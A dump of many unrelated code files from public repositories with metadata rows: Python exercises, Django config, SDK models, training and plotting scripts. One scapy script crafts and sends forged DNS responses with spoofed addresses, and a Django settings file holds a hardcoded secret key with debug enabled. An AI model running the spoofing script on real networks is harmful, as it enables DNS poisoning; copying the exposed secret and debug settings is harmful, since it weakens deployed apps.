368e6ea2ec3beae8484e00f5d2b77552687787da | d04d3eec289376e7682403af2f32044b3991d27b | /6 - Objects and Classes/Lab-1.py | bc2ec3fd61e84ac0da482be820de7019f23c313e | [] | no_license | m-evtimov96/softUni-python-fundamentals | 190002dbc6196211340126814e8ed4fce3b8a07f | 817a44a3d78130d37e58facfc7bcfdc8af5f4051 | refs/heads/master | 2020-12-10T12:45:27.847764 | 2020-06-23T13:09:43 | 2020-06-23T13:09:43 | 233,598,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | class Comment:
def __init__(self, username, content, likes = 0):
self.username = username
self.content = content
self.likes = likes
comment = Comment('user1', 'I like this book')
print(comment.username)
print(comment.content)
print(comment.likes)
| [
"m.evtimov196@gmail.com"
] | m.evtimov196@gmail.com |
7042a0bd3044411ecbe1410052639e87c767e370 | 1f227fa290b9b0669722ba5144f99b9b7f969d32 | /trash7djangoProject/settings.py | edaeea2e1d292b6038c57905937018d0679f72ef | [] | no_license | sglee487/trash7djangoProject | c8188259283cd89711cea9ff456c7224db841216 | 4bc9cc022199cfe83a876031901c98e202df2193 | refs/heads/master | 2023-08-16T22:03:25.294216 | 2021-10-02T03:25:53 | 2021-10-02T03:25:53 | 380,723,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,395 | py | """
Django settings for trash7djangoProject project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-r5bxqn2252sqg+=myto!b47otc(jy+rf25@nspec-5pt@-d7$y'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['13.209.34.118']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'sslserver'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'trash7djangoProject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates']
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'trash7djangoProject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'ko-ke'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
BASE_DIR / 'static',
]
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"sglee487@gmail.com"
] | sglee487@gmail.com |
a2eb2f15d648514d2fb306b3dfc4f32265613857 | 19236d9e966cf5bafbe5479d613a175211e1dd37 | /cohesity_management_sdk/models/tenant_view_update_details.py | 4bfe6d01532e5630f8534fce69d0d7d939816cd2 | [
"MIT"
] | permissive | hemanshu-cohesity/management-sdk-python | 236c44fbd9604809027f8ddd0ae6c36e4e727615 | 07c5adee58810979780679065250d82b4b2cdaab | refs/heads/master | 2020-04-29T23:22:08.909550 | 2019-04-10T02:42:16 | 2019-04-10T02:42:16 | 176,474,523 | 0 | 0 | NOASSERTION | 2019-03-19T09:27:14 | 2019-03-19T09:27:12 | null | UTF-8 | Python | false | false | 1,613 | py | # -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
class TenantViewUpdateDetails(object):
"""Implementation of the 'Tenant View Update Details.' model.
Specifies view update details about a tenant.
Attributes:
tenant_id (string): Specifies the unique id of the tenant.
view_names (list of string): Specifies the PolicyIds for respective
tenant.
"""
# Create a mapping from Model property names to API property names
_names = {
"tenant_id":'tenantId',
"view_names":'viewNames'
}
def __init__(self,
tenant_id=None,
view_names=None):
"""Constructor for the TenantViewUpdateDetails class"""
# Initialize members of the class
self.tenant_id = tenant_id
self.view_names = view_names
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
tenant_id = dictionary.get('tenantId')
view_names = dictionary.get('viewNames')
# Return an object of this model
return cls(tenant_id,
view_names)
| [
"ashish@cohesity.com"
] | ashish@cohesity.com |
8a4d3531c5aca0cc15b6816c3e76e0f611e2404c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02408/s132954082.py | adf3cae7f1f026a2ec83181f0895f2eaa43eaf7f | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | suit = {"S": 0, "H": 1, "C": 2, "D": 3}
suit_keys = list(suit.keys())
deck = [[suit_keys[i] + " " + str(j + 1) for j in range(13)] for i in range(4)]
for _ in range(int(input())):
card = input().split()
deck[suit[card[0]]][int(card[1]) - 1] = ""
for i in range(4):
for j in deck[i]:
if j != "":
print(j)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
75735120139c7430867a75bdaa0c5d627ceee1c6 | 2a6f6cc148cbccb55c826bf01e0159ef58a733ec | /train_script_TFR.py | b530c0917e7daaab9900ae33b730b0b625a92c6e | [] | no_license | QuantumPlumber/CookieBoxMachineLearning | 5e9a4ebf385aa40373d4d5dbc1020b40dc06500f | dfc60bb9b29d519618d59b10f9acae058f368e17 | refs/heads/master | 2022-11-21T20:13:52.507033 | 2019-09-19T02:09:00 | 2019-09-19T02:09:00 | 168,767,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,020 | py | import numpy as np
import time
#base_filename = 'reformed_TF_train_mp_1_quarter'
#base_filename = 'TF_train_update_TFR'
#base_filename = 'TF_train_waveform_TFR'
#base_filename = 'TF_train_wave_unwrapped_TFR'
base_filename = 'TF_train_wave_unwrapped_eggs_TFR'
dataset_size = 60000
TFR_filesize = 10000
def file_chunker(start, stop, step, base_filename):
for ii in np.arange(start, stop, step):
yield '{}_{}-{}'.format(base_filename, ii, ii + step)
file_chunks = file_chunker(start=0, stop=dataset_size, step=TFR_filesize, base_filename=base_filename)
file_list = []
for file in file_chunks:
file_list.append(file)
print(file_list)
repeat = 2
batch_size = 64
train_step = dataset_size*repeat
checkpoint = time.perf_counter()
classifier.train(
input_fn=lambda: fn.input_TFR_functor(TFRecords_file_list=file_list, long=TFR_filesize, repeat=repeat, batch_size=batch_size),
steps=train_step)
delta_t = checkpoint - time.perf_counter()
print('Trained {} epochs in {}'.format(repeat, delta_t))
| [
"44450703+QuantumPlumber@users.noreply.github.com"
] | 44450703+QuantumPlumber@users.noreply.github.com |
286662ec2018c9f32e6fb986fc832bc0ab1dc3cf | 5e8931a6bb8b883b9e2f4979ad4b469eabece11f | /appfat/blog/migrations/0011_auto_20180801_1543.py | 50fa24c12e04c6bad3e71a7fc5e11be56c9df76a | [] | no_license | dennyerikson/django-AppFat | accbfe232ab3895d39ee2ba2af69baff55d2986c | 476a821aba1aff7c4a3bea0dbafa03e145eb6325 | refs/heads/master | 2020-03-22T20:17:01.080648 | 2019-01-06T23:40:12 | 2019-01-06T23:40:12 | 140,586,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-08-01 18:43
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0010_auto_20180727_1711'),
]
operations = [
migrations.AlterField(
model_name='aluno',
name='alu_curso',
field=models.CharField(max_length=200),
),
]
| [
"dennyeriks00on@gmail.com"
] | dennyeriks00on@gmail.com |
dd0d4b267638c32c16c41ea77a4ed9f1a38c0773 | 6db1b8b05c6a4fb68f8514f07bc5725e881691ee | /test/test_updating_a_mailing_list_request.py | 80ee367c3265a652b4858a6e670f1b0dc9e0f7e6 | [] | no_license | mooTheo/Python-Moosend-Wrapper | 7cc776dc90a78484b605d33b6e0403fee27f99ac | eaf3b5f82960aef5dfd4201026e57e88ad663005 | refs/heads/master | 2021-07-07T20:55:32.994324 | 2017-10-03T14:17:42 | 2017-10-03T14:17:42 | 104,724,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 933 | py | # coding: utf-8
"""
Moosend API
TODO: Add a description
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import moosend
from moosend.rest import ApiException
from moosend.models.updating_a_mailing_list_request import UpdatingAMailingListRequest
class TestUpdatingAMailingListRequest(unittest.TestCase):
""" UpdatingAMailingListRequest unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testUpdatingAMailingListRequest(self):
"""
Test UpdatingAMailingListRequest
"""
# FIXME: construct object with mandatory attributes with example values
#model = moosend.models.updating_a_mailing_list_request.UpdatingAMailingListRequest()
pass
if __name__ == '__main__':
unittest.main()
| [
"theo@moosend.com"
] | theo@moosend.com |
30f4e4a5a110d3d3199fca57cbf4ebf05170115b | 6b8c52048648c82543ce899d5fb2f8b0dcabb6e5 | /heaps/misha&candies.py | fb7d4cc3ccfeafc3f4ba12ef01e7c2e4167e6994 | [] | no_license | arnabs542/DS-AlgoPrac | c9f7f0d383bcb3b793b09b219135f1bc9d607081 | fcc2d6d014e9ffdce3ff4b64d12ce054222e434d | refs/heads/master | 2022-12-13T05:56:33.098629 | 2020-09-15T13:48:54 | 2020-09-15T13:48:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,864 | py | """Misha and Candies
Misha loves eating candies. She has given N boxes of Candies. She decides, every time she will choose a box having the minimum number of candies, eat half of the candies and put the remaining candies in the other box that has the minimum number of candies. Misha does not like a box if it has the number of candies greater than K so she won't eat from that box. Can you find how many candies she will eat? Note: If a box has an odd number of candies then Misha will eat floor(odd/2)
Input Format
The first argument is A an Array of Integers, where A[i] is the number of candies in the ith box.
The second argument is K, the maximum number of candies Misha like in a box.
Output Format
Return an Integer X i.e number of candies Misha will eat.
Constraints
1 <= N <= 1e5
1 <= A[i] <= 1e5
1 <= K <= 1e6
For Example
Example Input:
A = [3, 2, 3]
k = 4
Example Output:
2
Explanation:
1st time Misha will eat from 2nd box, i.e 1 candy she'll eat and will put the remaining 1 candy in the 1st box.
2nd time she will eat from the 3rd box, i.e 1 candy she'll eat and will put the remaining 2 candies in the 1st box.
She will not eat from the 3rd box as now it has candies greater than K.
So the number of candies Misha eat is 2."""
class Solution:
# @param A : list of integers
# @param B : integer
# @return an integer
def solve(self, A, B):
if not A: return 0
import heapq as hq
hq.heapify(A)
ans = 0
while True:
# print(A)
temp = hq.heappop(A)
if temp > B:
return ans
eat = temp//2
ans += eat
if A:
next = hq.heappop(A)
hq.heappush(A, next+temp-eat)
else:
return ans
return ans | [
"vvrmahendra@gmail.com"
] | vvrmahendra@gmail.com |
ab8e5e33a928ac00940e2bd2a5eafe5e661de615 | c130a094e04eb448201ca2ab8ed4fe56cd1d80bc | /samples/openapi3/client/petstore/python-experimental/petstore_api/model/object_with_difficultly_named_props.py | 2429a2205a21853b42e39fce88ac749973f708a0 | [
"Apache-2.0"
] | permissive | janweinschenker/openapi-generator | 83fb57f9a5a94e548e9353cbf289f4b4172a724e | 2d927a738b1758c2213464e10985ee5124a091c6 | refs/heads/master | 2022-02-01T17:22:05.604745 | 2022-01-19T10:43:39 | 2022-01-19T10:43:39 | 221,860,152 | 1 | 0 | Apache-2.0 | 2019-11-15T06:36:25 | 2019-11-15T06:36:24 | null | UTF-8 | Python | false | false | 2,307 | py | # coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
import typing # noqa: F401
from frozendict import frozendict # noqa: F401
import decimal # noqa: F401
from datetime import date, datetime # noqa: F401
from frozendict import frozendict # noqa: F401
from petstore_api.schemas import ( # noqa: F401
AnyTypeSchema,
ComposedSchema,
DictSchema,
ListSchema,
StrSchema,
IntSchema,
Int32Schema,
Int64Schema,
Float32Schema,
Float64Schema,
NumberSchema,
DateSchema,
DateTimeSchema,
DecimalSchema,
BoolSchema,
BinarySchema,
NoneSchema,
none_type,
InstantiationMetadata,
Unset,
unset,
ComposedBase,
ListBase,
DictBase,
NoneBase,
StrBase,
IntBase,
NumberBase,
DateBase,
DateTimeBase,
BoolBase,
BinaryBase,
Schema,
_SchemaValidator,
_SchemaTypeChecker,
_SchemaEnumMaker
)
class ObjectWithDifficultlyNamedProps(
DictSchema
):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
model with properties that have invalid names for python
"""
_required_property_names = set((
'123-list',
))
special_property_name = Int64Schema
locals()['$special[property.name]'] = special_property_name
del locals()['special_property_name']
_123_list = StrSchema
locals()['123-list'] = _123_list
del locals()['_123_list']
_123_number = IntSchema
locals()['123Number'] = _123_number
del locals()['_123_number']
def __new__(
cls,
*args: typing.Union[dict, frozendict, ],
_instantiation_metadata: typing.Optional[InstantiationMetadata] = None,
**kwargs: typing.Type[Schema],
) -> 'ObjectWithDifficultlyNamedProps':
return super().__new__(
cls,
*args,
_instantiation_metadata=_instantiation_metadata,
**kwargs,
)
| [
"noreply@github.com"
] | janweinschenker.noreply@github.com |
e2b778c0ffee1ffdb0c49fc77cd4f43080f142f5 | d1944798306dab0d4e591d1522f6172fab36db3c | /0x03-python-data_structures/0-print_list_integer.py | fa7e7d395533a8174b4bab1d9641ef7059fea32d | [] | no_license | Fares84/holbertonschool-higher_level_programming | 775dc73abbc5cef89c7ea6835d99db5a7a9313c3 | 1a7527b6f140ac441dcc2506a77c858cdcd09be4 | refs/heads/master | 2023-05-03T10:41:07.945582 | 2021-05-15T12:36:10 | 2021-05-15T12:36:10 | 319,332,020 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 117 | py | #!/usr/bin/python3
def print_list_integer(my_list=[]):
for i in my_list:
print("{:d}".format(i))
| [
"fares.sassi2015@gmail.com"
] | fares.sassi2015@gmail.com |
e56902c26f13b52578ca430af1c005065ee503e9 | 28b9adc46eb9bb7616c4f74fe29f9a3417f2f963 | /SIM_PKL/catatan/models.py | 2cb3c0434d4c040bf64928b425a3d0f9c25523bb | [] | no_license | mohamad1213/SIMPKL | ca0a6dafb97b494e5edf9276e358f800eee808e1 | e6ef5d6b8a5c18c85067314a3664bf43959a0370 | refs/heads/master | 2023-01-04T18:27:06.306534 | 2020-11-03T06:53:50 | 2020-11-03T06:53:50 | 297,674,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 443 | py | from django.db import models
from datetime import datetime
from django.contrib.auth.models import User
class Catatan(models.Model):
owner = models.ForeignKey(User, on_delete = models.DO_NOTHING,related_name='catatan')
tgl_kegiatan = models.DateField(default=datetime.now)
judul = models.CharField(max_length=100)
ket = models.TextField(max_length=200)
upload_img = models.ImageField(default='', upload_to='images/')
| [
"hatami391998@gmail.com"
] | hatami391998@gmail.com |
24da05951cd9db1b073a0188ea67b0faf41a421c | 1c321bd2ca285625fe89e62519b04d26aaf83060 | /networking/dns/dnstest.py | 364fc028e848290c48f3c33d41c1ad212ea69638 | [] | no_license | w31ha0/hackTools | e554706a755102113a644b62b6816585c02570b5 | f133a96ed1922dce0c0758110ba93aedef0e61fd | refs/heads/master | 2021-01-21T12:36:02.581405 | 2018-04-23T06:54:05 | 2018-04-23T06:54:05 | 91,798,452 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | #!/usr/bin/env python
# This code is strictly for demonstration purposes.
# If used in any other way or for any other purposes. In no way am I responsible
# for your actions or any damage which may occur as a result of its usage
# dnsSpoof.py
# Author: Nik Alleyne - nikalleyne at gmail dot com
# http://securitynik.blogspot.com
from os import uname
from subprocess import call
from sys import argv, exit
from time import ctime, sleep
from scapy.all import *
spoofedIPPkt = IP(src='1.2.3.4',dst='1.2.3.4')
spoofedUDP_TCPPacket = UDP(sport=53,dport=123)
spoofedDNSPakcet = DNS(id=1,qr=1,opcode=1,aa=1,rd=0,ra=0,z=0,rcode=0,qdcount=1,ancount=1,nscount=1,arcount=1,qd=DNSQR(qname="google.com",qtype=1,qclass=1),an=DNSRR(rrname="google.com",rdata='1.1.1.1',ttl=86400),ns=DNSRR(rrname="google.com",type=2,ttl=86400,rdata=argv[2]),ar=DNSRR(rrname="google.com",rdata='1.1.1.1'))
pckToSend = Ether()/spoofedIPPkt/spoofedUDP_TCPPacket/spoofedDNSPakcet
sendp(pckToSend,iface=argv[1].strip(), count=1)
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
bde8f107575dc263a831f0089ca35d8a3d5bb93f | d001abba19711d678f2ba09dfbd5c84357be6bb0 | /src/contest/yukicoder/280/B.py | 025b75bdeffc6dfe7b3305220a7944a2bbfcf387 | [] | no_license | cormoran/CompetitiveProgramming | 89f8b3ceda97985d32b8cd91056b49abeb243e6f | fa0e479ab299f53984fa7541d088c10c447fb6e4 | refs/heads/master | 2020-04-17T19:59:49.724498 | 2020-03-28T15:46:26 | 2020-03-28T15:46:26 | 65,995,023 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | py | #!/usr/bin/env python3
import fractions
N = int(input())
Z = list(map(int, input().split()))
G = fractions.Fraction(1, 1);
for i in range(N - 1):
G *= fractions.Fraction(Z[i + 1], Z[i])
print(str(G.numerator) + '/' + str(G.denominator))
| [
"cormoran707@gmail.com"
] | cormoran707@gmail.com |
c5061c88d417dc3ff636d5051915df0c3f4e6865 | 80d50ea48e10674b1b7d3f583a1c4b7d0b01200f | /src/datadog_api_client/v1/model/table_widget_definition_type.py | 41754b3fe02824bdb701f7c9092457b96605e51b | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] | permissive | DataDog/datadog-api-client-python | 3e01fa630278ad0b5c7005f08b7f61d07aa87345 | 392de360e7de659ee25e4a6753706820ca7c6a92 | refs/heads/master | 2023-09-01T20:32:37.718187 | 2023-09-01T14:42:04 | 2023-09-01T14:42:04 | 193,793,657 | 82 | 36 | Apache-2.0 | 2023-09-14T18:22:39 | 2019-06-25T22:52:04 | Python | UTF-8 | Python | false | false | 882 | py | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
from __future__ import annotations
from datadog_api_client.model_utils import (
ModelSimple,
cached_property,
)
from typing import ClassVar
class TableWidgetDefinitionType(ModelSimple):
"""
Type of the table widget.
:param value: If omitted defaults to "query_table". Must be one of ["query_table"].
:type value: str
"""
allowed_values = {
"query_table",
}
QUERY_TABLE: ClassVar["TableWidgetDefinitionType"]
@cached_property
def openapi_types(_):
return {
"value": (str,),
}
TableWidgetDefinitionType.QUERY_TABLE = TableWidgetDefinitionType("query_table")
| [
"noreply@github.com"
] | DataDog.noreply@github.com |
b41ef3fee8820ab56138281c31348d0908d77313 | 92699c30f0ef36e6c76024c0966ad453bcd4e893 | /visualize.py | 73277a64915b433240deaf1f2365582459b10188 | [
"MIT"
] | permissive | AungMyatSan/unsup-3d-keypoints | c333b71216087d01e219288969a2dcaae9257ead | 93af69ba92bb00d1d2785967055df30ac745f95c | refs/heads/main | 2023-08-25T20:09:11.010042 | 2021-11-03T15:57:52 | 2021-11-03T15:57:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | from experiments import algo_registry, get_args
if __name__ == '__main__':
args = get_args()
experiment = algo_registry[args.algo](args)
experiment.visualize()
| [
"boyuanchen@berkeley.edu"
] | boyuanchen@berkeley.edu |
b84e495770b8be41ab78265bf2524294bb4b5a9b | f64d4fbc4c5b206ca0c4d05ff5eb13aa8d6b0f22 | /temperature-dependency/quick-plots.py | 0a9f90cd7c0566a37cadcedcbb67ac7fdef056f1 | [
"BSD-3-Clause"
] | permissive | mirams/hERGRapidCharacterisation | 66e4d9a57df29c36bc268efce7eeb7b3a9011781 | db838a354bf49f953d5ae36d33a94498a4c01dea | refs/heads/master | 2022-12-31T02:52:15.373956 | 2019-07-18T13:17:58 | 2019-07-18T13:17:58 | 203,183,652 | 0 | 0 | BSD-3-Clause | 2019-08-19T13:57:51 | 2019-08-19T13:57:48 | null | UTF-8 | Python | false | false | 10,653 | py | #!/usr/bin/env python2
from __future__ import print_function
import sys
sys.path.append('../lib')
import os
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import protocols
import model_ikr as m
from releakcorrect import I_releak, score_leak, protocol_leak_check
from scipy.optimize import fmin
savedir = './figs'
if not os.path.isdir(savedir):
os.makedirs(savedir)
data_dir_staircase = '../data'
data_dir = '../data-autoLC'
file_dir = './out'
file_list = [
'herg25oc1',
'herg27oc1',
'herg30oc1',
'herg33oc1',
'herg37oc3',
]
temperatures = np.array([25.0, 27.0, 30.0, 33.0, 37.0])
temperatures += 273.15 # in K
fit_seed = 542811797
#
# Protocol info
#
protocol_funcs = {
'staircaseramp': protocols.leak_staircase,
'pharma': protocols.pharma, # during drug application
'apab': 'protocol-apab.csv',
'apabv3': 'protocol-apabv3.csv',
'ap05hz': 'protocol-ap05hz.csv',
'ap1hz': 'protocol-ap1hz.csv',
'ap2hz': 'protocol-ap2hz.csv',
'sactiv': protocols.sactiv,
'sinactiv': protocols.sinactiv,
}
protocol_dir = '../protocol-time-series'
protocol_list = [
'staircaseramp',
'sactiv',
'sinactiv',
'pharma',
'apab',
'apabv3',
'ap05hz',
'ap1hz',
'ap2hz',
]
prt_ylim = [
(-1500, 2250),
(-0.025, 1.025),
(-3.25, 1.025),
(-250, 2250),
(-250, 2250),
(-250, 2250),
(-250, 2250),
(-250, 2250),
(-250, 2250),
]
prt_ylim = [
(-0.02, 0.04),
(-0.025, 1.025),
(-3.25, 1.025),
(-0.005, 0.04),
(-0.005, 0.04),
(-0.005, 0.04),
(-0.005, 0.04),
(-0.005, 0.04),
(-0.005, 0.04),
]
# IV protocol special treatment
protocol_iv = [
'sactiv',
'sinactiv',
]
protocol_iv_times = {
'sactiv': protocols.sactiv_times,
'sinactiv': protocols.sinactiv_times,
}
protocol_iv_convert = {
'sactiv': protocols.sactiv_convert,
'sinactiv': protocols.sinactiv_convert,
}
protocol_iv_args = {
'sactiv': protocols.sactiv_iv_arg,
'sinactiv': protocols.sinactiv_iv_arg,
}
protocol_iv_v = {
'sactiv': protocols.sactiv_v,
'sinactiv': protocols.sinactiv_v,
}
# Eyring and Q10
from temperature_models import eyringA, eyringB, eyringG, eyringT
from temperature_models import q10A, q10B, q10G, q10T
from temperature_models import eyring_transform_to_model_param
eyring_mean = np.loadtxt('%s/eyring-mean.txt' % file_dir)
eyring_std = np.loadtxt('%s/eyring-std.txt' % file_dir)
q10_mean = np.loadtxt('%s/q10-mean.txt' % file_dir)
q10_std = np.loadtxt('%s/q10-std.txt' % file_dir)
# Model
prt2model = {}
for prt in protocol_list:
protocol_def = protocol_funcs[prt]
if type(protocol_def) is str:
protocol_def = '%s/%s' % (protocol_dir, protocol_def)
prt2model[prt] = m.Model('../mmt-model-files/kylie-2017-IKr.mmt',
protocol_def=protocol_def,
temperature=temperatures[0], # K
transform=None,
useFilterCap=False) # ignore capacitive spike
# Plot
for i_prt, prt in enumerate(protocol_list):
fig, axes = plt.subplots(2, len(temperatures), figsize=(16, 6))
print('Plotting', prt)
# Time point
times = np.loadtxt('%s/%s-%s-times.csv' % (data_dir, 'herg25oc1',
prt), delimiter=',', skiprows=1)
# Protocol
model = prt2model[prt]
if prt not in protocol_iv:
times_sim = np.copy(times)[::5]
voltage = model.voltage(times) * 1000
else:
times_sim = protocol_iv_times[prt](times[1] - times[0])
voltage = model.voltage(times_sim) * 1000
voltage, t = protocol_iv_convert[prt](voltage, times_sim)
assert(np.mean(np.abs(t - times)) < 1e-8)
# Temperatures
for i_T, T in enumerate(temperatures):
axes[0, i_T].set_title(r'T = %s$^o$C' % (T - 273.15))
if prt not in protocol_iv:
axes[0, i_T].plot(times, voltage, c='#7f7f7f')
else:
for i in range(voltage.shape[1]):
axes[0, i_T].plot(times, voltage[:, i], c='#696969')
file_name = file_list[i_T]
selectedfile = './manualselection/manualselected-%s.txt' % (file_name)
selectedwell = []
with open(selectedfile, 'r') as f:
for l in f:
if not l.startswith('#'):
selectedwell.append(l.split()[0])
print('Getting', file_name)
if i_T < 4:
selectedwell = selectedwell[:50]
# Eyring parameters
np.random.seed(int(T)) # 'different cell at different T'
eyring_T_mean = eyringT(eyring_mean, T)
eyring_T_std = eyringT(eyring_std, T)
eyring_param = np.random.normal(eyring_T_mean, eyring_T_std,
size=(len(selectedwell), len(eyring_mean)))
eyring_model_param = eyring_transform_to_model_param(
eyring_param.T, T).T
# Q10 parameters
np.random.seed(int(T)) # 'different cell at different T'
q10_T_mean = q10T(q10_mean, T)
q10_T_std = q10T(q10_std, T)
q10_param = np.random.normal(q10_T_mean, q10_T_std,
size=(len(selectedwell), len(q10_mean)))
q10_model_param = eyring_transform_to_model_param(q10_param.T, T).T
for i_cell, cell in enumerate(selectedwell):
# Data
if prt == 'staircaseramp':
data = np.loadtxt('%s/%s-%s-%s.csv' % (data_dir_staircase,
file_name, prt, cell), delimiter=',', skiprows=1)
elif prt not in protocol_iv:
data = np.loadtxt('%s/%s-%s-%s.csv' % (data_dir, file_name,
prt, cell), delimiter=',', skiprows=1)
# Set seed
np.random.seed(101)
# Re-leak correct the leak corrected data...
g_releak = fmin(score_leak, [0.0], args=(data, voltage, times,
protocol_leak_check[prt]), disp=False)
data = I_releak(g_releak[0], data, voltage)
else:
data = np.loadtxt('%s/%s-%s-%s.csv' % (data_dir, file_name,
prt, cell), delimiter=',', skiprows=1)
for i in range(data.shape[1]):
# Set seed
np.random.seed(101)
g_releak = fmin(score_leak, [0.0], args=(data[:, i],
voltage[:, i], times,
protocol_leak_check[prt]), disp=False)
data[:, i] = I_releak(g_releak[0], data[:, i],
voltage[:, i])
assert(len(data) == len(times))
# Fitted parameters
param_file = '%s/%s/%s-staircaseramp-%s-solution-%s.txt' % \
(file_dir, file_name, file_name, cell, fit_seed)
parameters = np.loadtxt(param_file)
# Plot
if prt in protocol_iv:
iv_v = protocol_iv_v[prt]() * 1000 # mV
iv_i = protocols.get_corrected_iv(data, times,
*protocol_iv_args[prt]())
axes[1, i_T].plot(iv_v, iv_i / np.max(iv_i), lw=0.4, alpha=0.5,
c='C0', zorder=0)
else:
axes[1, i_T].plot(times, data / parameters[0], alpha=0.5,
lw=0.3, c='C0', zorder=0)
# Individual fit
simulation = model.simulate(parameters, times_sim)
if prt in protocol_iv:
simulation, t = protocol_iv_convert[prt](simulation, times_sim)
assert(np.mean(np.abs(t - times)) < 1e-8)
iv_v = protocol_iv_v[prt]() * 1000 # mV
iv_i = protocols.get_corrected_iv(simulation, times,
*protocol_iv_args[prt]())
axes[1, i_T].plot(iv_v, iv_i / np.max(iv_i), lw=0.4, alpha=0.5,
c='C1', zorder=1)
else:
axes[1, i_T].plot(times_sim, simulation / parameters[0],
alpha=0.5, lw=0.4, c='C1', zorder=1)
# Eyring
eyring_sim = model.simulate(eyring_model_param[i_cell], times_sim)
if prt in protocol_iv:
eyring_sim, t = protocol_iv_convert[prt](eyring_sim, times_sim)
assert(np.mean(np.abs(t - times)) < 1e-8)
iv_v = protocol_iv_v[prt]() * 1000 # mV
iv_i = protocols.get_corrected_iv(eyring_sim, times,
*protocol_iv_args[prt]())
axes[1, i_T].plot(iv_v, iv_i / np.max(iv_i), lw=0.4, alpha=0.5,
c='C2', zorder=2, label='Eyring')
else:
axes[1, i_T].plot(times_sim,
eyring_sim / eyring_model_param[i_cell][0],
